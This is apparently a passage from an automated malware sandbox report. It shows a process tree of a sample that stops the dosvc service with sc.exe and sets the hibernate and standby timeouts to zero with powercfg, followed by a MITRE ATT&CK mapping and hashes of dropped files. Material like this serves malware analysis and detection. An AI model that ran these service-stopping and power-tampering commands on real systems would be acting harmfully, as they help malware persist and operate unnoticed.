C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:6072
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4112
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3656
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5368
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5304
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:3632
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Power Settings
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD54a8750d37bdeb0dbbedfd93483f62e1e
SHA102513d378b383b09baff52d447a636cc3908c5ed
SHA256f0a7444bbb339ba67fdd6a66dbd62ab98dddf69beb510751e5105cef96772a44
SHA5121872b51d05dd4b2dbfc72035173351ee786bc49190e73ab5f7cfcdc50c5896a619d84c74d4fd43f739b3715c7b3be9aa82cce8196c34d33b02e59b25b296118f
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9.3MB
MD5a8133dab079ce24c46a35749109d8f34
SHA1455ac75b069b855bd3785a0f56d69276b8e83b01
SHA256c8c36f079915be17e2c725b4247ceca4269e42fa6712f59d90147b103d60251e
SHA512a57ecbda300a2a92c034177bf70cf441606ae9a68e1d0ec1be032921cea44d5fdfde23c5dfcf10dcc9b97a518b0a31d752fb24b344a5f80c30aa3e20e429ec06
-
Filesize
2.5MB
MD5514e00d37d15901490a4974d59e63c96
SHA180575034e11501ad1fff1ad865234d109cbc6a16
SHA25651371a9eb105df4a666f224347e377bc294358ad022d3c4a739fe3f65e09637d
SHA512e55508411a803333cb67bb12a8b6f76b9f627a94de87263ba44e59e00e70722b938b3de5fc14bcd5d37871bbf760751ba973454eb077efdaae0a26b96138c255
-
Filesize
4.6MB
MD52b6652feda7a55cb7967f85bcd1b14c7
SHA1d81e9e4dfc8389a4b79574410d87650c3b0f9113
SHA25630b83d446e3ce4d03a9c03bd2c928dc8bde76067ceab120088ea3ac49e1d8cf8
SHA512622b592aaa2591645029c079569106581e35fb5998d51a9e1fbd6faa68116f854a9d6ce7bdceff712e18000ea4c6af5b1977282a730d6d04fbe00005e2330e4f